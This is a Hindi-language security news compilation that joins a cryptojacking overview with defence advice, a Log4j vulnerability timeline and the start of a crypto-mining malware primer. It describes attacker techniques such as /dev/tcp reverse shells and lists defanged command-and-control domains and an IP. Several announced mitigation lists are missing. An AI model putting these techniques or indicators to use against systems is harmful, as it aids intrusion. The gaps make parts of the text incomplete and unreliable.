ReasonLabs की एक रिपोर्ट के अनुसार, पिछले वर्ष पाए गए सभी ट्रोजन में से 58.4% क्रिप्टोजैकिंग सिक्का माइनर थे। वहीं, SonicWall के एक अन्य अध्ययन में पाया गया कि 2021 क्रिप्टोजैकिंग हमलों के लिए अब तक का सबसे खराब वर्ष था, जिसमें वर्ष के दौरान श्रेणी में 97.1 मिलियन हमले दर्ज किए गए। ये संख्याएँ इतनी मजबूत हैं क्योंकि क्रिप्टोजैकिंग वस्तुतः साइबर अपराधियों के लिए पैसा छाप रहा है।
जब कोई बदमाश पीड़ित मशीनों से मुक्त कम्प्यूट संसाधनों के प्रतीत होने वाले असीमित पूल पर क्रिप्टोकरेंसी माइन कर सकता है, तो उनके लिए लाभ बहुत बड़ा है। इस वसंत में बिटकॉइन मूल्यांकन में भारी गिरावट के बावजूद जो इसे $30,000 के स्तर से नीचे ले आया, क्रिप्टोजैकर्स के अवैध मार्जिन अभी भी व्यावसायिक समझ रखते हैं क्योंकि वे जो माइन करते हैं उसका मूल्य उनके आपराधिक बुनियादी ढांचे की लागत से कहीं अधिक है।
कैडो लैब्स की सुरक्षा अनुसंधान टीम के एक हनीपॉट ने खोजा कि एक बहु-चरणीय क्रिप्टोजैकिंग हमला जो उजागर Docker Engine API endpoints और Redis सर्वरों को लक्षित करता है, और कीड़े की तरह फैल सकता है। यह हमला WatchDog हमला समूह द्वारा किया गया है, जो 2021 के अंत और 2022 में कई क्रिप्टोजैकिंग अभियानों के साथ विशेष रूप से सक्रिय रहा है।
TeamTNT पहले हैकिंग समूहों में से एक था जिसने क्रिप्टोजैकिंग का ध्यान भारी रूप से क्लाउड-उन्मुख सेवाओं पर स्थानांतरित किया। 2021 के अंत में TrendMicro के शोधकर्ताओं ने रिपोर्ट की कि यह समूह, Kinsig गिरोह जैसे प्रतिद्वंद्वियों के साथ, क्रिप्टोजैकिंग अभियान चला रहे थे जो Alibaba Elastic Computing Service (ECS) इंस्टेंस में माइनर स्थापित करते थे और पहचान से बचने के लिए सुरक्षा सुविधाओं को अक्षम करते थे।
Log4Shell भेद्यता 2022 में क्रिप्टोजैकिंग हमलावरों के लिए वरदान रही है। एक उल्लेखनीय उदाहरण में, Sophos शोधकर्ताओं ने पाया कि इस वर्ष की शुरुआत में हमलावरों की एक 'भीड़' VMware Horizon सर्वरों को लक्षित कर रही थी ताकि क्रिप्टोजैकिंग पेलोड की एक श्रृंखला वितरित की जा सके जिसमें z0Miner, JavaX माइनर और कम से कम दो XMRig वेरिएंट, Jin और Mimu क्रिप्टोकरेंसी माइनर बॉट शामिल थे।
2021 की शरद ऋतु में सॉफ्टवेयर आपूर्ति श्रृंखला सुरक्षा विशेषज्ञों Sonatype ने npm, जो दुनिया भर के डेवलपर्स द्वारा उपयोग किया जाने वाला JavaScript पैकेज रिपॉजिटरी है, में दुर्भावनापूर्ण क्रिप्टोमाइनिंग पैकेज छिपे होने के बारे में अलार्म बजाया। उस समय इसने तीन पैकेज पाए, जिनमें से कम से कम एक "ua-parser-js" नामक एक लोकप्रिय, वैध लाइब्रेरी का रूप धारण कर रहा था, जिसे साप्ताहिक रूप से 7 मिलियन से अधिक डाउनलोड मिलते हैं और यह डेवलपर्स को गलती से एक दुर्भावनापूर्ण कोड डाउनलोड करने और अपने सॉफ्टवेयर में स्थापित करने के लिए लुभाने का एक आदर्श तरीका होगा।
उस रिपोर्ट के कुछ महीने बाद, शोधकर्ताओं WhiteSource (अब Mend) ने एक अतिरिक्त रिपोर्ट जारी की जिसमें दिखाया गया कि npm दुर्भावनापूर्ण कोड से भरा हुआ है—1,300 तक दुर्भावनापूर्ण पैकेज जिनमें क्रिप्टोजैकिंग और अन्य दुष्ट व्यवहार शामिल हैं।
पिछली गर्मियों में बिटडिफ़ेंडर ने खोजा था एक रोमानियाई खतरा समूह जो SSH क्रेडेंशियल्स का उपयोग करके लिनक्स-आधारित मशीनों को लक्षित कर रहा था ताकि Monero माइनिंग मैलवेयर तैनात किया जा सके। उनके द्वारा उपयोग किए जाने वाले उपकरण एक सेवा-के-रूप में वितरित किए गए थे। यह उदाहरण एक बढ़ती प्रवृत्ति के भाले की नोक पर था जो लिनक्स सिस्टम क्रिप्टोमाइनिंग हमलों का प्रतीत होता है। VMware की रिपोर्ट में इस वर्ष की शुरुआत में लिनक्स-आधारित मल्टी-क्लाउड वातावरणों, विशेष रूप से XMRig माइनिंग सॉफ्टवेयर का उपयोग करके, को लक्षित करने की बढ़ती प्रवृत्ति का विवरण दिया गया था।
“लिनक्स-आधारित सिस्टमों से क्रिप्टोमाइनिंग के कई नमूनों का XMRig एप्लिकेशन से कुछ संबंध है,” रिपोर्ट ने समझाया, जिसमें दिखाया गया कि 89% क्रिप्टोमाइनिंग हमलों में XMRig-संबंधित लाइब्रेरी का उपयोग किया गया। “इसलिए, जब लिनक्स बाइनरी में XMRig-विशिष्ट लाइब्रेरी और मॉड्यूल की पहचान की जाती है, तो यह संभावित क्रिप्टोमाइनिंग व्यवहार का सबूत होने की संभावना है।”
CoinStop एक और क्रिप्टोजैकिंग अभियान है जो हाल ही में एशियाई क्लाउड सेवा प्रदाताओं (CSPs) को लक्षित करते हुए खोजा गया। यह अपने एंटी-फोरेंसिक और चोरी-छिपी उपायों द्वारा अलग पहचान बनाता है। Cado के Muir ने हमले पर रिपोर्ट में बताया कि इनमें सिस्टम टाइमस्टैम्प में हेरफेर करने के लिए टाइमस्टॉम्पिंग, सिस्टम क्रिप्टोग्राफिक नीतियों को हटाना, और रिवर्स शेल सत्र बनाने के लिए /dev/tcp डिवाइस फ़ाइल का उपयोग शामिल था।
क्रिप्टोजैकर्स कभी-कभी कॉरपोरेट इंफ्रास्ट्रक्चर से न केवल प्रोसेसिंग पावर बल्कि ऊर्जा और नेटवर्क संसाधनों को चुराने के लिए बड़ी हद तक जा सकते हैं। पिछले साल Darktrace के विश्लेषकों ने उजागर किया था अपने एक ग्राहक से एक अनाम उदाहरण जहां उन्होंने एक गोदाम में एक क्रिप्टोमाइनिंग फार्म खोजा जो कार्डबोर्ड बक्सों के एक साधारण सेट के अंदर छिपा हुआ था। अंदर एक चुपचाप चलने वाली रिग थी जिसमें कई GPU लगे थे जो कंपनी के नेटवर्क पावर से जुड़े हुए थे।
जैसे-जैसे यह एंडपॉइंट, सर्वर और क्लाउड संसाधनों में फैलने वाले मल्टी-वेक्टर हमले में विकसित हुआ है, क्रिप्टोजैकिंग को रोकने के लिए एक समन्वित और सर्वांगीण रक्षा रणनीति की आवश्यकता होती है। निम्नलिखित कदम एंटरप्राइज संसाधनों पर क्रिप्टोजैकिंग को उग्र होने से रोकने में मदद कर सकते हैं।
मजबूत एंडपॉइंट सुरक्षा का उपयोग करें: इसका आधार एंडपॉइंट सुरक्षा और एंटी-मैलवेयर का उपयोग करना है जो क्रिप्टोमाइनर्स का पता लगाने में सक्षम हो, साथ ही वेब फिल्टर को अप-टू-डेट रखना और ब्राउज़र एक्सटेंशन का प्रबंधन करना ताकि ब्राउज़र-आधारित स्क्रिप्ट के निष्पादन के जोखिम को कम किया जा सके। संगठनों को आदर्श रूप से ऐसे एंडपॉइंट सुरक्षा प्लेटफॉर्म की तलाश करनी चाहिए जो सर्वर और उससे आगे तक विस्तार कर सकें।
सर्वर (और बाकी सब कुछ) को पैच और हार्डन करें। क्रिप्टोजैकर्स उस सबसे आसान शिकार की तलाश करते हैं जिसे वे चुपचाप काट सकते हैं—इसमें पुरानी कमजोरियों वाले सार्वजनिक रूप से उजागर सर्वरों की स्कैनिंग शामिल है। बुनियादी सर्वर हार्डनिंग जिसमें पैचिंग, अप्रयुक्त सेवाओं को बंद करना, और बाहरी पदचिह्नों को सीमित करना शामिल है, सर्वर-आधारित हमलों के जोखिम को कम करने में बहुत मदद कर सकता है।
सॉफ्टवेयर संरचना विश्लेषण का उपयोग करें। सॉफ्टवेयर संरचना विश्लेषण (SCA) उपकरण सॉफ्टवेयर के भीतर उपयोग किए जा रहे घटकों की बेहतर दृश्यता प्रदान करते हैं ताकि सिक्का माइनिंग स्क्रिप्ट का लाभ उठाने वाले सप्लाई चेन हमलों को रोका जा सके।
क्लाउड मिसकॉन्फ़िगरेशन की तलाश करें। संगठन क्लाउड में क्रिप्टोजैकिंग को रोकने के सबसे प्रभावशाली तरीकों में से एक है क्लाउड और कंटेनर कॉन्फ़िगरेशन को कसना। इसका मतलब है उचित प्रमाणीकरण के बिना सार्वजनिक इंटरनेट पर उजागर क्लाउड सेवाओं को ढूंढना, उजागर API सर्वरों को जड़ से खत्म करना, और डेवलपर वातावरणों में संग्रहीत और एप्लिकेशन में हार्डकोड किए गए क्रेडेंशियल्स और अन्य रहस्यों को समाप्त करना।
क्रिप्टोजैकिंग एक क्लासिक धीमी-और-स्थिर साइबर हमला है जिसे दीर्घकालिक पता लगाने से बचने के लिए न्यूनतम निशान छोड़ने के लिए डिज़ाइन किया गया है। जबकि एंडपॉइंट सुरक्षा प्लेटफॉर्म और एंडपॉइंट डिटेक्शन एंड रिस्पॉन्स तकनीकों ने क्रिप्टोजैकिंग हमलों के प्रति सचेत करने में काफी प्रगति की है, बुरे लोग इस मोर्चे पर चोरी-छिपी में माहिर हैं और अवैध कॉइन माइनर्स का पता लगाना अभी भी मुश्किल हो सकता है, खासकर जब केवल कुछ सिस्टम से समझौता किया गया हो। निम्नलिखित क्रिप्टोजैकिंग के संकेतों को चिह्नित करने के लिए कुछ अतिरिक्त तरीके हैं।
अपने हेल्प डेस्क को क्रिप्टोमाइनिंग के संकेत देखने के लिए प्रशिक्षित करें। कभी-कभी उपयोगकर्ता एंडपॉइंट पर पहला संकेत कंप्यूटर के धीमे प्रदर्शन के बारे में हेल्प डेस्क शिकायतों में वृद्धि होती है। इससे आगे की जांच के लिए एक लाल झंडा उठना चाहिए, जैसे उपकरणों का अधिक गर्म होना या मोबाइल उपकरणों में खराब बैटरी प्रदर्शन।
नेटवर्क मॉनिटरिंग समाधान तैनात करें। नेटवर्क मॉनिटरिंग उपकरण उस तरह के वेब ट्रैफ़िक और आउटबाउंड C2 ट्रैफ़िक को पकड़ने में एक शक्तिशाली उपकरण प्रदान कर सकते हैं जो क्रिप्टोजैकिंग गतिविधि को इंगित करता है, चाहे वह किसी भी डिवाइस से आ रहा हो।
“यदि आपके पास एक सर्वर पर अच्छा ईग्रेस फ़िल्टरिंग है जहां आप आउटबाउंड कनेक्शन शुरू करने पर नज़र रख रहे हैं, तो यह [क्रिप्टोमाइनिंग मैलवेयर] का पता लगाने के लिए अच्छा हो सकता है,” Archaea Energy के उपाध्यक्ष और CISO ट्रैविस फैरल कहते हैं। हालांकि, वह चेतावनी देते हैं कि क्रिप्टोमाइनर लेखक अपने मैलवेयर को उस पहचान विधि से बचने के लिए लिख सकते हैं।
क्लाउड मॉनिटरिंग और कंटेनर रनटाइम सुरक्षा का उपयोग करें। क्लाउड मॉनिटरिंग और कंटेनर रनटाइम सुरक्षा स्कैनिंग जैसे विकसित उपकरण क्लाउड वातावरण में अतिरिक्त दृश्यता प्रदान कर सकते हैं जो अनधिकृत क्रिप्टोमाइनर्स से प्रभावित हो सकते हैं। क्लाउड प्रदाता इस प्रकार की दृश्यता को अपनी सेवा में शामिल कर रहे हैं, कभी-कभी ऐड-ऑन के रूप में। उदाहरण के लिए, Google Cloud ने इस वर्ष की शुरुआत में अपने Security Command Center का विस्तार किया ताकि इसमें वह शामिल हो सके जिसे वह Virtual Machine Threat Detection (VMTD) कहता है, ताकि क्लाउड में क्रिप्टोमाइनिंग के संकेतों को उठाया जा सके, अन्य क्लाउड खतरों के अलावा।
नियमित खतरे की खोज में शामिल हों। चूंकि बहुत सारे क्रिप्टोजैकिंग हमले गुप्त होते हैं और कुछ निशान छोड़ते हैं, संगठनों को नियमित रूप से समझौते के सूक्ष्म संकेतों की तलाश करने और जांच के साथ पालन करने के लिए खतरे की खोज जैसे अधिक सक्रिय उपाय करने की आवश्यकता हो सकती है।
“एंडपॉइंट सुरक्षा और SOC टीमों को संभावित विनाशकारी कुछ होने की प्रतीक्षा करने के बजाय सक्रिय अभ्यास और खतरे की खोज में समय निवेश करना चाहिए,” LogRhythm के विन्सेंट कहते हैं।
क्रिप्टोमाइनिंग कोड के लिए अपनी वेबसाइटों की निगरानी करें। फैरल चेतावनी देते हैं कि क्रिप्टोजैकर्स वेब सर्वर पर जावास्क्रिप्ट कोड के बिट्स रखने के तरीके ढूंढ रहे हैं। “सर्वर स्वयं लक्ष्य नहीं है, बल्कि वेबसाइट पर आने वाला कोई भी व्यक्ति [संक्रमण के जोखिम में है],” वे कहते हैं। वह वेब सर्वर पर फ़ाइल परिवर्तनों या पृष्ठों में परिवर्तनों की नियमित निगरानी की सिफारिश करते हैं।
अवैध क्रिप्टोमाइनिंग गतिविधि का पता चलने के बाद, क्रिप्टोजैकिंग हमले का जवाब देने के लिए मानक साइबर घटना प्रतिक्रिया चरणों का पालन करना चाहिए जिसमें रोकथाम, उन्मूलन, वसूली और सीखे गए सबक शामिल हैं। क्रिप्टोजैकिंग हमले का जवाब देने के लिए कुछ सुझावों में शामिल हैं:
वेब-डिलीवर की गई स्क्रिप्ट को मारें। ब्राउज़र-आधारित JavaScript हमलों के लिए, क्रिप्टोमाइनिंग का पता चलने पर समाधान सरल है: स्क्रिप्ट चलाने वाले ब्राउज़र टैब को मारें। IT को स्क्रिप्ट के स्रोत वेबसाइट URL को नोट करना चाहिए और इसे ब्लॉक करने के लिए कंपनी के वेब फ़िल्टर को अपडेट करना चाहिए।
समझौता किए गए कंटेनर इंस्टेंस को बंद करें। कॉइन माइनर्स से समझौता किए गए कंटेनर इंस्टेंस जैसे अपरिवर्तनीय क्लाउड इंफ्रास्ट्रक्चर को भी सरलता से संभाला जा सकता है, संक्रमित कंटेनर इंस्टेंस को बंद करके और नए सिरे से शुरू करके। हालांकि, संगठनों को पहले स्थान पर कंटेनर समझौते के मूल कारणों की खोज करनी चाहिए। इसका मतलब है इस बात के संकेत देखना कि कंटेनर डैशबोर्ड और क्रेडेंशियल्स से समझौता किया गया है और समझौते के संकेतों के लिए जुड़े क्लाउड संसाधनों की जांच करना। एक महत्वपूर्ण कदम यह सुनिश्चित करना है कि पुराने को बदलने के लिए नया कंटेनर इमेज समान रूप से कॉन्फ़िगर न किया गया हो।
अनुमतियां कम करें और API कुंजियां पुनर्जीवित करें। क्लाउड-आधारित क्रिप्टोजैकिंग से उन्मूलन और पूरी तरह से वसूली के लिए संगठनों को प्रभावित क्लाउड संसाधनों (और उनसे जुड़े लोगों) की अनुमतियां कम करनी होंगी और API कुंजियां पुनर्जीवित करनी होंगी ताकि हमलावरों को उसी क्लाउड वातावरण में वापस आने से रोका जा सके।
सीखें और अनुकूलित करें। अनुभव का उपयोग करके बेहतर ढंग से समझें कि हमलावर आपके सिस्टम से समझौता करने में कैसे सक्षम था। अपने उपयोगकर्ता, हेल्पडेस्क, IT और SOC विश्लेषक प्रशिक्षण को अपडेट करें ताकि वे क्रिप्टोजैकिंग प्रयासों की पहचान करने और तदनुसार प्रतिक्रिया देने में बेहतर सक्षम हो सकें।
संपादक का नोट: यह लेख, मूल रूप से फरवरी 2018 में प्रकाशित, नए शोध, सर्वोत्तम प्रथाओं और क्रिप्टोजैकिंग उदाहरणों को शामिल करने के लिए अद्यतन किया गया है।
Apache Log4j कमजोरी ने दिसंबर की शुरुआत में खोजे जाने के बाद से वैश्विक सुर्खियां बटोरी हैं। इस दोष ने दुनिया भर में बड़ी संख्या में संगठनों को प्रभावित किया है क्योंकि सुरक्षा टीमों ने संबंधित जोखिमों को कम करने के लिए संघर्ष किया है। यहाँ Log4j कमजोरी के आसपास की प्रमुख घटनाओं की एक समयरेखा है जैसा कि वे सामने आई हैं।
Apache ने Log4j में एक महत्वपूर्ण कमजोरी के बारे में विवरण जारी किया, जो लाखों जावा-आधारित एप्लिकेशन में उपयोग की जाने वाली एक लॉगिंग लाइब्रेरी है। हमलावरों ने दोष (CVE-2021-44228) का शोषण करना शुरू कर दिया – जिसे “Log4Shell” नाम दिया गया, जिसे CVSS कमजोरी रेटिंग पैमाने पर 10 में से 10 रेटिंग दी गई। यह कमजोर एप्लिकेशन चलाने वाले अंतर्निहित सर्वरों पर रिमोट कोड निष्पादन (RCE) का कारण बन सकता है। “एक हमलावर जो लॉग संदेशों या लॉग संदेश मापदंडों को नियंत्रित कर सकता है, जब संदेश लुकअप प्रतिस्थापन सक्षम होता है, तो LDAP सर्वरों से लोड किए गए मनमाने कोड को निष्पादित कर सकता है,” Apache डेवलपर्स ने एक सलाह में लिखा। इस मुद्दे के लिए एक फिक्स Log4j 2.15.0 के रिलीज के साथ उपलब्ध कराया गया क्योंकि दुनिया भर की सुरक्षा टीमों ने अपने संगठनों की सुरक्षा के लिए काम किया। व्यवसायों को नवीनतम संस्करण स्थापित करने का आग्रह किया गया।
जैसे-जैसे कमजोरी का परिणाम जारी रहा, UK के राष्ट्रीय साइबर सुरक्षा केंद्र (NCSC) ने UK कंपनियों को दोष के बारे में एक सार्वजनिक चेतावनी जारी की और शमन के लिए रणनीतियों की रूपरेखा तैयार की। NCSC ने सभी संगठनों को सलाह दी कि जहाँ भी Log4j का उपयोग ज्ञात है, वहाँ तुरंत नवीनतम अपडेट स्थापित करें। “यह सभी UK संगठनों के लिए पहली प्राथमिकता होनी चाहिए जो ऐसे सॉफ्टवेयर का उपयोग करते हैं जिसमें Log4j शामिल होना ज्ञात है। संगठनों को इंटरनेट-फेसिंग और गैर-इंटरनेट-फेसिंग दोनों सॉफ्टवेयर को अपडेट करना चाहिए,” बयान में पढ़ा गया। व्यवसायों को Log4j के अज्ञात उदाहरणों की तलाश करने और सुरक्षात्मक नेटवर्क मॉनिटरिंग/ब्लॉकिंग तैनात करने का भी आग्रह किया गया।
UK के NCSC की तरह, अमेरिकी साइबर सुरक्षा और बुनियादी ढांचा सुरक्षा एजेंसी (CISA) ने Log4j कमजोरी पर सार्वजनिक रूप से प्रतिक्रिया व्यक्त की, निदेशक जेन ईस्टरली ने नेटवर्क रक्षकों के लिए प्रस्तुत तत्काल चुनौती पर विचार किया। “CISA Log4j सॉफ्टवेयर लाइब्रेरी वाले उत्पादों को प्रभावित करने वाली एक महत्वपूर्ण कमजोरी को सक्रिय रूप से संबोधित करने के लिए अपने सार्वजनिक और निजी क्षेत्र के भागीदारों के साथ मिलकर काम कर रहा है,” उसने एक बयान में कहा। “हम इस कमजोरी के शमन को आगे बढ़ाने और किसी भी संबंधित खतरे की गतिविधि का पता लगाने के लिए तत्काल कार्रवाई कर रहे हैं। हमने इस कमजोरी को ज्ञात शोषित कमजोरियों की अपनी सूची में जोड़ दिया है, जो संघीय नागरिक एजेंसियों को मजबूर करता है – और गैर-संघीय भागीदारों को संकेत देता है – तत्काल इस कमजोरी को पैच या सुधारने के लिए। हम सक्रिय रूप से उन संस्थाओं तक पहुंच रहे हैं जिनके नेटवर्क कमजोर हो सकते हैं और सरकार और उद्योग भागीदारों को कमजोरी के जोखिम या शोषण की पहचान करने में मदद करने के लिए अपने स्कैनिंग और घुसपैठ का पता लगाने वाले उपकरणों का लाभ उठा रहे हैं।”
CISA ने संपत्ति मालिकों को कमजोरी को कम करने में मदद करने के लिए तीन अतिरिक्त, तत्काल कदम उठाने की सिफारिश की:
Apache Log4j को प्रभावित करने वाली दूसरी कमजोरी की खोज की गई। नया शोषण, CVE 2021-45046, दुर्भावनापूर्ण अभिनेताओं को JNDI लुकअप पैटर्न का उपयोग करके दुर्भावनापूर्ण इनपुट डेटा तैयार करने की अनुमति देता है ताकि CVE विवरण के अनुसार सेवा-अस्वीकृति (DoS) हमले किए जा सकें। शोषण के लिए एक नया पैच उपलब्ध कराया गया जिसने संदेश लुकअप पैटर्न के लिए समर्थन हटा दिया और डिफ़ॉल्ट रूप से JNDI कार्यक्षमता को अक्षम कर दिया, मूल दोष के लिए Log4j 2.15.0 फिक्स कुछ गैर-डिफ़ॉल्ट कॉन्फ़िगरेशन में अधूरा था।
“जबकि CVE-2021-45046 मूल कमजोरी की तुलना में कम गंभीर है, यह खतरे के अभिनेताओं के लिए अप्रचलित या अनुचित रूप से पैच किए गए सिस्टम के खिलाफ दुर्भावनापूर्ण हमले करने का एक और वेक्टर बन जाता है,” Resilience में जोखिम और प्रतिक्रिया के प्रमुख एमी चांग ने CSO को दोष की खोज के तुरंत बाद बताया। “CVE-2021-44228 के लिए अपूर्ण पैच का दुरुपयोग दुर्भावनापूर्ण इनपुट डेटा तैयार करने के लिए किया जा सकता है, जिसके परिणामस्वरूप DoS हमला हो सकता है। एक DoS हमला एक मशीन या नेटवर्क को बंद कर सकता है और इसे अपने इच्छित उपयोगकर्ताओं के लिए दुर्गम बना सकता है,” उसने आगे कहा। संगठनों को जल्द से जल्द Log4j: 2.16.0 में अपडेट करने की सलाह दी गई।
Apache ने तीसरी प्रमुख Log4j कमजोरी का विवरण प्रकाशित किया और एक और फिक्स उपलब्ध कराया। यह 10 में से 7.5 रेटेड एक अनंत पुनरावृत्ति दोष था। “Log4j टीम को एक सुरक्षा कमजोरी, CVE-2021-45105, के बारे में अवगत कराया गया है, जिसे Java 8 और उससे ऊपर के लिए Log4j 2.17.0 में संबोधित किया गया है,” इसने लिखा। “Apache Log4j2 संस्करण 2.0-alpha1 से 2.16.0 तक स्व-संदर्भित लुकअप से अनियंत्रित पुनरावृत्ति से सुरक्षित नहीं थे। जब लॉगिंग कॉन्फ़िगरेशन कॉन्टेक्स्ट लुकअप (उदाहरण के लिए, $${ctx:loginId}) के साथ एक गैर-डिफ़ॉल्ट पैटर्न लेआउट का उपयोग करता है, तो थ्रेड कॉन्टेक्स्ट मैप (MDC) इनपुट डेटा पर नियंत्रण रखने वाले हमलावर दुर्भावनापूर्ण इनपुट डेटा तैयार कर सकते हैं जिसमें एक पुनरावर्ती लुकअप होता है, जिसके परिणामस्वरूप एक StackOverflowError होता है जो प्रक्रिया को समाप्त कर देगा। इसे DoS (सेवा-अस्वीकृति) हमले के रूप में भी जाना जाता है।”
Apache ने निम्नलिखित शमन भी रेखांकित किए:
साइबर सुरक्षा अनुसंधान समूह Cryptolaemus ने चेतावनी दी कि Log4j कमजोरी का शोषण किया जा रहा था ताकि Windows उपकरणों को Dridex बैंकिंग ट्रोजन और Linux उपकरणों को Meterpreter से संक्रमित किया जा सके। Dridex मैलवेयर का एक रूप है जो Microsoft Word से मैक्रोज़ का उपयोग करने वाली प्रणाली के माध्यम से बैंक क्रेडेंशियल्स चुराता है, जबकि Meterpreter एक Metasploit हमला पेलोड है जो एक इंटरैक्टिव शेल प्रदान करता है जिससे हमलावर लक्ष्य मशीन का पता लगा सकता है और कोड निष्पादित कर सकता है। Cryptolaemus सदस्य जोसेफ रूसेन ने BleepingComputer को बताया कि खतरे के अभिनेता हमलावर-नियंत्रित रिमोट सर्वर से एक जावा क्लास को लोड और निष्पादित करने के लिए कमजोर उपकरणों को मजबूर करने के लिए Log4j RMI (रिमोट मेथड इनवोकेशन) शोषण संस्करण का उपयोग करते हैं।
साइबर सुरक्षा विक्रेता Tenable द्वारा जारी डेटा से पता चला कि सभी संपत्तियों में से एक-दसवां हिस्सा Log4Shell के लिए कमजोर था, जबकि 30% संगठनों ने बग के लिए स्कैन करना शुरू नहीं किया था। “मूल्यांकन की गई संपत्तियों में से, Log4Shell लगभग 10% में पाया गया है, जिसमें सर्वर, वेब एप्लिकेशन, कंटेनर और IoT उपकरणों की एक विस्तृत श्रृंखला शामिल है,” एक Tenable ब्लॉग पोस्टिंग में पढ़ा गया। “Log4Shell सभी उद्योगों और भौगोलिक क्षेत्रों में व्यापक है। दस में से एक कॉर्पोरेट सर्वर उजागर हो रहा है। दस में से एक वेब एप्लिकेशन और इसी तरह। हमारे डिजिटल बुनियादी ढांचे के लगभग हर पहलू का दसवां हिस्सा Log4Shell के माध्यम से दुर्भावनापूर्ण शोषण की संभावना रखता है।”
विक्रेता ने चेतावनी दी कि Log4Shell में EternalBlue (WannaCry हमलों में शोषित) की तुलना में अधिक संभावित खतरा है क्योंकि Log4j बुनियादी ढांचे और एप्लिकेशन दोनों में व्यापक है। “इतिहास में किसी भी एकल कमजोरी ने इतने स्पष्ट रूप से सुधार की मांग नहीं की है। Log4Shell कंप्यूटिंग को परिभाषित करेगा जैसा कि हम जानते हैं, उन लोगों को अलग करके जिन्होंने खुद को बचाने का प्रयास किया और जो लापरवाह होने में सहज हैं,” इसने आगे कहा।
संघीय व्यापार आयोग (FTC) ने अमेरिकी संगठनों से Log4Shell कमजोरी को तुरंत पैच करने का आग्रह किया, अन्यथा एजेंसी से दंडात्मक कार्रवाई का जोखिम उठाना पड़ सकता है। "जब कमजोरियों की खोज की जाती है और उनका शोषण किया जाता है, तो इससे व्यक्तिगत जानकारी का नुकसान या उल्लंघन, वित्तीय नुकसान और अन्य अपरिवर्तनीय नुकसान का जोखिम होता है। ज्ञात सॉफ्टवेयर कमजोरियों को कम करने के लिए उचित कदम उठाने का कर्तव्य, अन्य कानूनों के अलावा, संघीय व्यापार आयोग अधिनियम और ग्राम-लीच-ब्लिली अधिनियम को प्रभावित करता है," FTC ने कहा। इसने आगे कहा कि यह महत्वपूर्ण है कि कंपनियां और उनके विक्रेता जो Log4j पर निर्भर हैं, उपभोक्ताओं को नुकसान की संभावना को कम करने और FTC की कानूनी कार्रवाई से बचने के लिए अभी कार्रवाई करें। "FTC का इरादा उन कंपनियों के खिलाफ अपनी पूर्ण कानूनी शक्ति का उपयोग करने का है जो Log4j, या भविष्य में इसी तरह की ज्ञात कमजोरियों के परिणामस्वरूप उपभोक्ता डेटा को जोखिम से बचाने के लिए उचित कदम उठाने में विफल रहती हैं।"
माइक्रोसॉफ्ट ने अपने Log4j कमजोरी मार्गदर्शन पृष्ठ को एक चीन-आधारित रैनसमवेयर ऑपरेटर (DEV-0401) के विवरण के साथ अपडेट किया, जो इंटरनेट-फेसिंग सिस्टम को लक्षित कर रहा है और NightSky रैनसमवेयर तैनात कर रहा है। "4 जनवरी की शुरुआत में, हमलावरों ने VMware Horizon चलाने वाले इंटरनेट-फेसिंग सिस्टम में CVE-2021-44228 कमजोरी का शोषण करना शुरू कर दिया," इसने लिखा। "DEV-0401 ने पहले LockFile, AtomSilo, और Rook सहित कई रैनसमवेयर परिवारों को तैनात किया है, और इसी तरह Confluence (CVE-2021-26084) और ऑन-प्रिमाइसेस एक्सचेंज सर्वर (CVE-2021-34473) चलाने वाले इंटरनेट-फेसिंग सिस्टम का शोषण किया है।" माइक्रोसॉफ्ट के विश्लेषण के आधार पर, हमलावरों को कमांड और कंट्रोल (CnC) सर्वर का उपयोग करते हुए पाया गया जो वैध डोमेन का प्रतिरूपण करते हैं। इनमें service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, और 139[.]180[.]217[.]203 शामिल हैं।
सुरक्षा 101: क्रिप्टोकरेंसी-माइनिंग मैलवेयर का प्रभाव
ऑस्ट्रेलियाई सरकार ने अभी-अभी डिजिटल मुद्रा को एक कानूनी भुगतान पद्धति के रूप में मान्यता दी है। 1 जुलाई से, बिटकॉइन जैसी डिजिटल मुद्राओं का उपयोग करके की गई खरीदारी देश के वस्तु एवं सेवा कर से मुक्त हैं ताकि दोहरे कराधान से बचा जा सके। इस प्रकार, व्यापारियों और निवेशकों पर कानूनी एक्सचेंज प्लेटफार्मों के माध्यम से उन्हें खरीदने और बेचने पर कर नहीं लगाया जाएगा।
जापान, जिसने पिछले अप्रैल में बिटकॉइन को भुगतान के एक रूप के रूप में वैध किया था, पहले से ही उम्मीद करता है कि 20,000 से अधिक व्यापारी बिटकॉइन भुगतान स्वीकार करेंगे। अन्य देश भी आंशिक रूप से इस बैंडवैगन में शामिल हो रहे हैं: स्विट्जरलैंड, नॉर्वे, और नीदरलैंड में व्यवसाय और कुछ सार्वजनिक संगठन। एक हालिया अध्ययन में, क्रिप्टोकरेंसी वॉलेट के अद्वितीय, सक्रिय उपयोगकर्ताओं की संख्या 2.9 से 5.8 मिलियन के बीच आंकी गई है, जिनमें से अधिकांश उत्तरी अमेरिका और यूरोप में हैं।
लेकिन डिजिटल मुद्राओं की स्वीकृति और अपनाने का ऑनलाइन खतरों से क्या संबंध है? वास्तव में, बहुत कुछ। जैसे-जैसे बिटकॉइन जैसी क्रिप्टोकरेंसी वास्तविक दुनिया में लोकप्रियता हासिल कर रही हैं, वैसे-वैसे साइबर आपराधिक खतरे भी बढ़ेंगे जो इसका दुरुपयोग करते हैं। लेकिन वास्तव में कैसे? इसका व्यवसायों और आम उपयोगकर्ताओं के लिए क्या मतलब है?
क्रिप्टोकरेंसी एक एन्क्रिप्टेड डेटा स्ट्रिंग है जो मुद्रा की एक इकाई को दर्शाती है। इसकी निगरानी और आयोजन एक पीयर-टू-पीयर नेटवर्क द्वारा किया जाता है जिसे ब्लॉकचेन भी कहा जाता है, जो लेन-देन के एक सुरक्षित बहीखाता के रूप में भी कार्य करता है, जैसे खरीदना, बेचना और स्थानांतरित करना। भौतिक मुद्रा के विपरीत, क्रिप्टोकरेंसी विकेंद्रीकृत होती हैं, जिसका अर्थ है कि वे सरकारों या अन्य वित्तीय संस्थानों द्वारा जारी नहीं की जाती हैं।
